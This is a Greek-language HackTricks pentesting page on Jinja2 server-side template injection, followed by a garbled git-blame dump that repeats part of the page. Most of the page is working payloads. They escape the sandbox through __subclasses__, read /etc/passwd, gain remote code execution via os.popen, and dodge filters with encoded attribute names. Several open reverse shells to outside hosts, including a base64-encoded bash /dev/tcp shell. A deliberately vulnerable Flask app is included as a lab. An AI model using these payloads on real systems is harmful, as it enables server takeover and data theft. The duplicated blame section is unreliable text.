hacktricks/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md

# Jinja2 SSTI

<details>

<summary><strong>Μάθετε την κακόβουλη εισβολή στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Άλλοι τρόποι υποστήριξης του HackTricks:

* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Μοιραστείτε τα κόλπα σας στην κακόβουλη εισβολή υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.

</details>

## **Εργαστήριο**
```python
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/")
def home():
if request.args.get('c'):
return render_template_string(request.args.get('c'))
else:
return "Hello, send someting inside the param 'c'!"

if __name__ == "__main__":
app.run()
```
## **Διάφορα**

### **Δήλωση Αποσφαλμάτωσης**

Εάν η Επέκταση Αποσφαλμάτωσης είναι ενεργοποιημένη, ένα ετικέτα `debug` θα είναι διαθέσιμο για να εκτυπώσει το τρέχον πλαίσιο καθώς και τα διαθέσιμα φίλτρα και τεστ. Αυτό είναι χρήσιμο για να δείτε τι είναι διαθέσιμο για χρήση στο πρότυπο χωρίς την ανάγκη να ρυθμίσετε έναν αποσφαλματωτή.
```python
<pre>

{% raw %}
{% debug %}
{% endraw %}


</pre>
```
### **Αδειάστε όλες τις μεταβλητές διαμόρφωσης**

Προσοχή: Η εκτέλεση αυτής της ενέργειας μπορεί να αποκαλύψει ευαίσθητες πληροφορίες.
```python
{{ config }} #In these object you can find all the configured env variables


{% raw %}
{% for key, value in config.items() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
{% endraw %}

```
## **Jinja Ενσωμάτωση**

Καταρχάς, σε μια Jinja ενσωμάτωση χρειάζεται να **βρείτε έναν τρόπο να δραπετεύσετε από το χωροχρονικό περιορισμό** και να ανακτήσετε πρόσβαση στην κανονική ροή εκτέλεσης της Python. Για να το κάνετε αυτό, πρέπει να **καταχραστείτε αντικείμενα** που είναι **από το μη-χωροχρονικά περιορισμένο περιβάλλον αλλά είναι προσβάσιμα από το χωροχρονικά περιορισμένο περιβάλλον**.

### Πρόσβαση σε Παγκόσμια Αντικείμενα

Για παράδειγμα, στον κώδικα `render_template("hello.html", username=username, email=email)` τα αντικείμενα username και email **προέρχονται από το μη-χωροχρονικά περιορισμένο περιβάλλον της Python** και θα είναι **προσβάσιμα** μέσα στο **χωροχρονικά περιορισμένο περιβάλλον**.\
Επιπλέον, υπάρχουν και άλλα αντικείμενα που θα είναι **πάντα προσβάσιμα από το χωροχρονικά περιορισμένο περιβάλλον**, αυτά είναι:
```
[]
''
()
dict
config
request
```
### Ανάκτηση του \<class 'object'>

Στη συνέχεια, από αυτά τα αντικείμενα πρέπει να φτάσουμε στην κλάση: **`<class 'object'>`** προκειμένου να προσπαθήσουμε να **ανακτήσουμε** τις ορισμένες **κλάσεις**. Αυτό οφείλεται στο γεγονός ότι από αυτό το αντικείμενο μπορούμε να καλέσουμε τη μέθοδο **`__subclasses__`** και να **έχουμε πρόσβαση σε όλες τις κλάσεις από το μη-αμμοδιοποιημένο** περιβάλλον python.

Για να έχετε πρόσβαση σε αυτήν την **κλάση αντικειμένου**, πρέπει να **έχετε πρόσβαση σε ένα αντικείμενο κλάσης** και στη συνέχεια να έχετε πρόσβαση είτε στο **`__base__`**, **`__mro__()[-1]`** ή `.`**`mro()[-1]`. Και στη συνέχεια, **μετά** την επίτευξη αυτής της **κλάσης αντικειμένου** καλούμε **`__subclasses__()`**.

Ελέγξτε αυτά τα παραδείγματα:
```python
# To access a class object
[].__class__
''.__class__
()["__class__"] # You can also access attributes like this
request["__class__"]
config.__class__
dict #It's already a class

# From a class to access the class "object".
## "dict" used as example from the previous list:
dict.__base__
dict["__base__"]
dict.mro()[-1]
dict.__mro__[-1]
(dict|attr("__mro__"))[-1]
(dict|attr("\x5f\x5fmro\x5f\x5f"))[-1]

# From the "object" class call __subclasses__()
{{ dict.__base__.__subclasses__() }}
{{ dict.mro()[-1].__subclasses__() }}
{{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))() }}

{% raw %}
{% with a = dict.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}

# Other examples using these ways
{{ ().__class__.__base__.__subclasses__() }}
{{ [].__class__.__mro__[-1].__subclasses__() }}
{{ ((""|attr("__class__")|attr("__mro__"))[-1]|attr("__subclasses__"))() }}
{{ request.__class__.mro()[-1].__subclasses__() }}
{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
{% endraw %}


# Not sure if this will work, but I saw it somewhere
{{ [].class.base.subclasses() }}
{{ ''.class.mro()[1].subclasses() }}
```
### Αποδράστε από το RCE

**Έχοντας ανακτήσει** `<class 'object'>` και καλέσει το `__subclasses__` μπορούμε τώρα να χρησιμοποιήσουμε αυτές τις κλάσεις για να διαβάσουμε και να γράψουμε αρχεία και να εκτελέσουμε κ
```python
# ''.__class__.__mro__[1].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
**RCE**
```python
# The class 396 is the class <class 'subprocess.Popen'>
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

# Calling os.popen without guessing the index of the class

{% raw %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

## Passing the cmd line in a GET param
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{% endraw %}


```
Για να μάθετε για **περισσότερα classes** που μπορείτε να χρησιμοποιήσετε για να **αποδράσετε** μπορείτε να **ελέγξετε**:

{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}

### Παρακάμψεις φίλτρων

#### Συνηθισμένες παρακάμψεις

Αυτές οι παρακάμψεις θα μας επιτρέψουν να **έχουμε πρόσβαση** στα **χαρακτηριστικά** των αντικειμένων **χωρίς να χρησιμοποιούμε ορισμένους χαρακτήρες**.\
Έχουμε ήδη δει μερικές από αυτές τις παρακάμψεις στα παραδείγματα του προηγούμενου, αλλά ας τις περιλάβουμε εδώ:
```bash
# Without quotes, _, [, ]
## Basic ones
request.__class__
request["__class__"]
request['\x5f\x5fclass\x5f\x5f']
request|attr("__class__")
request|attr(["_"*2, "class", "_"*2]|join) # Join trick

## Using request object options
request|attr(request.headers.c) #Send a header like "c: __class__" (any trick using get params can be used with headers also)
request|attr(request.args.c) #Send a param like "?c=__class__
request|attr(request.query_string[2:16].decode() #Send a param like "?c=__class__
request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join) # Join list to string
http://localhost:5000/?c={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ #Formatting the string from get params

## Lists without "[" and "]"
http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_

# Using with

{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
{% endraw %}

```
* [**Επιστρέψτε εδώ για περισσότερες επιλογές πρόσβασης σε ένα παγκόσμιο αντικείμενο**](jinja2-ssti.md#accessing-global-objects)
* [**Επιστρέψτε εδώ για περισσότερες επιλογές πρόσβασης στην κλάση αντικειμένου**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
* [**Διαβάστε αυτό για να λάβετε RCE χωρίς την κλάση αντικειμένου**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)

**Αποφυγή κωδικοποίησης HTML**

Από προεπιλογή, το Flask κωδικοποιεί HTML όλα τα μέσα σε ένα πρότυπο για λόγους ασφαλείας:
```python
{{'<script>alert(1);</script>'}}
#will be
&lt;script&gt;alert(1);&lt;/script&gt;
```
**Το φίλτρο `safe`** μας επιτρέπει να ενσωματώσουμε κώδικα JavaScript και HTML στη σελίδα **χωρίς** να γίνει **κωδικοποίηση HTML**, όπως εδώ:
```python
{{'<script>alert(1);</script>'|safe}}
#will be
<script>alert(1);</script>
```
**RCE με τη συγγραφή ενός κακόβουλου αρχείου ρύθμισης.**
```python
# evil config
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}

# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}

# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
## Χωρίς αρκετούς χαρακτήρες

Χωρίς **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
```python
{% raw %}
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
{% endraw %}

```
## Jinja Ενσωμάτωση χωρίς **\<class 'object'>**

Από τα [**παγκόσμια αντικείμενα**](jinja2-ssti.md#accessing-global-objects) υπάρχει άλλος τρόπος να φτάσετε σε **RCE χωρίς να χρησιμοποιήσετε αυτή την κλάση.**\
Αν καταφέρετε να φτάσετε σε οποιαδήποτε **συνάρτηση** από αυτά τα παγκόσμια αντικείμενα, θα μπορείτε να έχετε πρόσβαση στο **`__globals__.__builtins__`** και από εκεί το **RCE** είναι πολύ **απλό**.

Μπορείτε να **βρείτε συναρτήσεις** από τα αντικείμενα **`request`**, **`config`** και οποιοδήποτε **άλλο** ενδιαφέρον **παγκόσμιο αντικείμενο** στο οποίο έχετε πρόσβαση με:
```bash
{{ request.__class__.__dict__ }}
- application
- _load_form_data
- on_json_loading_failed

{{ config.__class__.__dict__ }}
- __init__
- from_envvar
- from_pyfile
- from_object
- from_file
- from_json
- from_mapping
- get_namespace
- __repr__

# You can iterate through children objects to find more
```
Αφού βρείτε μερικές λειτουργίες, μπορείτε να ανακτήσετε τα builtins με:
```python
# Read file
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}

# RCE
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}
{{ config.__class__.from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}
{{ (config|attr("__class__")).from_envvar["__globals__"]["__builtins__"]["__import__"]("os").popen("ls").read() }}

{% raw %}
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("ls")["read"]() %} {{ a }} {% endwith %}
{% endraw %}

## Extra
## The global from config have a access to a function called import_string
## with this function you don't need to access the builtins
{{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read() }}

# All the bypasses seen in the previous sections are also valid
```
## Αναφορές

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Ελέγξτε το [κόλπο attr για να παρακάμψετε μαύρες λέξεις σε αυτό το σημείο](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
* [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
* [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)

<details>

<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Άλλοι τρόποι υποστήριξης του HackTricks:

* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.

</details>
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								# Jinja2 SSTI
 								<details>
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								<summary><strong>Μάθετε την κακόβουλη εισβολή στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Άλλοι τρόποι υποστήριξης του HackTricks:
-												arte

											
										
										
											2024-01-01 17:15:42 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 								* **Μοιραστείτε τα κόλπα σας στην κακόβουλη εισβολή υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								</details>
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								## **Εργαστήριο**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								from flask import Flask, request, render_template_string
 								app = Flask(__name__)
 								@app.route("/")
 								def home():
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								if request.args.get('c'):
 								return render_template_string(request.args.get('c'))
 								else:
 								return "Hello, send someting inside the param 'c'!"
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								if __name__ == "__main__":
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								app.run()
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								## **Διάφορα**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								### **Δήλωση Αποσφαλμάτωσης**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Εάν η Επέκταση Αποσφαλμάτωσης είναι ενεργοποιημένη, ένα ετικέτα `debug` θα είναι διαθέσιμο για να εκτυπώσει το τρέχον πλαίσιο καθώς και τα διαθέσιμα φίλτρα και τεστ. Αυτό είναι χρήσιμο για να δείτε τι είναι διαθέσιμο για χρήση στο πρότυπο χωρίς την ανάγκη να ρυθμίσετε έναν αποσφαλματωτή.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								<pre>
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
 								{% debug %}
 								{% endraw %}
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3671] No subject

											
										
										
											2022-12-09 14:47:58 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								</pre>
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								### **Αδειάστε όλες τις μεταβλητές διαμόρφωσης**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Προσοχή: Η εκτέλεση αυτής της ενέργειας μπορεί να αποκαλύψει ευαίσθητες πληροφορίες.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								{{ config }} #In these object you can find all the configured env variables
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
-												GitBook: [#3651] No subject

											
										
										
											2022-11-05 10:28:41 +00:00
+								{% for key, value in config.items() %}
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								<dt>{{ key|e }}</dt>
 								<dd>{{ value|e }}</dd>
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% endfor %}
 								{% endraw %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								## **Jinja Ενσωμάτωση**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Καταρχάς, σε μια Jinja ενσωμάτωση χρειάζεται να **βρείτε έναν τρόπο να δραπετεύσετε από το χωροχρονικό περιορισμό** και να ανακτήσετε πρόσβαση στην κανονική ροή εκτέλεσης της Python. Για να το κάνετε αυτό, πρέπει να **καταχραστείτε αντικείμενα** που είναι **από το μη-χωροχρονικά περιορισμένο περιβάλλον αλλά είναι προσβάσιμα από το χωροχρονικά περιορισμένο περιβάλλον**.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								### Πρόσβαση σε Παγκόσμια Αντικείμενα
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Για παράδειγμα, στον κώδικα `render_template("hello.html", username=username, email=email)` τα αντικείμενα username και email **προέρχονται από το μη-χωροχρονικά περιορισμένο περιβάλλον της Python** και θα είναι **προσβάσιμα** μέσα στο **χωροχρονικά περιορισμένο περιβάλλον**.\
 								Επιπλέον, υπάρχουν και άλλα αντικείμενα που θα είναι **πάντα προσβάσιμα από το χωροχρονικά περιορισμένο περιβάλλον**, αυτά είναι:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
 								[]
 								''
 								()
 								dict
 								config
 								request
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								### Ανάκτηση του \<class 'object'>
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Στη συνέχεια, από αυτά τα αντικείμενα πρέπει να φτάσουμε στην κλάση: **`<class 'object'>`** προκειμένου να προσπαθήσουμε να **ανακτήσουμε** τις ορισμένες **κλάσεις**. Αυτό οφείλεται στο γεγονός ότι από αυτό το αντικείμενο μπορούμε να καλέσουμε τη μέθοδο **`__subclasses__`** και να **έχουμε πρόσβαση σε όλες τις κλάσεις από το μη-αμμοδιοποιημένο** περιβάλλον python.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Για να έχετε πρόσβαση σε αυτήν την **κλάση αντικειμένου**, πρέπει να **έχετε πρόσβαση σε ένα αντικείμενο κλάσης** και στη συνέχεια να έχετε πρόσβαση είτε στο **`__base__`**, **`__mro__()[-1]`** ή `.`**`mro()[-1]`. Και στη συνέχεια, **μετά** την επίτευξη αυτής της **κλάσης αντικειμένου** καλούμε **`__subclasses__()`**.
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								Ελέγξτε αυτά τα παραδείγματα:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								# To access a class object
 								[].__class__
 								''.__class__
 								()["__class__"] # You can also access attributes like this
 								request["__class__"]
 								config.__class__
 								dict #It's already a class
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								# From a class to access the class "object".
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								## "dict" used as example from the previous list:
 								dict.__base__
 								dict["__base__"]
 								dict.mro()[-1]
 								dict.__mro__[-1]
 								(dict|attr("__mro__"))[-1]
 								(dict|attr("\x5f\x5fmro\x5f\x5f"))[-1]
 								# From the "object" class call __subclasses__()
 								{{ dict.__base__.__subclasses__() }}
 								{{ dict.mro()[-1].__subclasses__() }}
 								{{ (dict.mro()[-1]|attr("\x5f\x5fsubclasses\x5f\x5f"))() }}
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
 								{% with a = dict.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
 								# Other examples using these ways
 								{{ ().__class__.__base__.__subclasses__() }}
 								{{ [].__class__.__mro__[-1].__subclasses__() }}
 								{{ ((""|attr("__class__")|attr("__mro__"))[-1]|attr("__subclasses__"))() }}
 								{{ request.__class__.mro()[-1].__subclasses__() }}
 								{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}
 								{% endraw %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								# Not sure if this will work, but I saw it somewhere
 								{{ [].class.base.subclasses() }}
 								{{ ''.class.mro()[1].subclasses() }}
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								### Αποδράστε από το RCE
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								**Έχοντας ανακτήσει** `<class 'object'>` και καλέσει το `__subclasses__` μπορούμε τώρα να χρησιμοποιήσουμε αυτές τις κλάσεις για να διαβάσουμε και να γράψουμε αρχεία και να εκτελέσουμε κ
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
-												GitBook: [#3651] No subject

											
										
										
											2022-11-05 10:28:41 +00:00
+								# ''.__class__.__mro__[1].__subclasses__()[40] = File class
 								{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
 								{{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								**RCE**
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```python
 								# The class 396 is the class <class 'subprocess.Popen'>
 								{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 								# Calling os.popen without guessing the index of the class
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								{% raw %}
 								{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %}
 								{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 								## Passing the cmd line in a GET param
 								{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
 								{% endraw %}
-												GitBook: [#3475] No subject

											
										
										
											2022-09-09 11:57:02 +00:00
-												GitBook: [#3671] No subject

											
										
										
											2022-12-09 14:47:58 +00:00
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								Για να μάθετε για **περισσότερα classes** που μπορείτε να χρησιμοποιήσετε για να **αποδράσετε** μπορείτε να **ελέγξετε**:
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
 								{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
 								[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
 								{% endcontent-ref %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 17:48:55 +00:00
+								### Παρακάμψεις φίλτρων
-												GitBook: [#3327] No subject

											
										
										
											2022-07-20 01:03:41 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								#### Συνηθισμένες παρακάμψεις
-												GitBook: [#3327] No subject

											
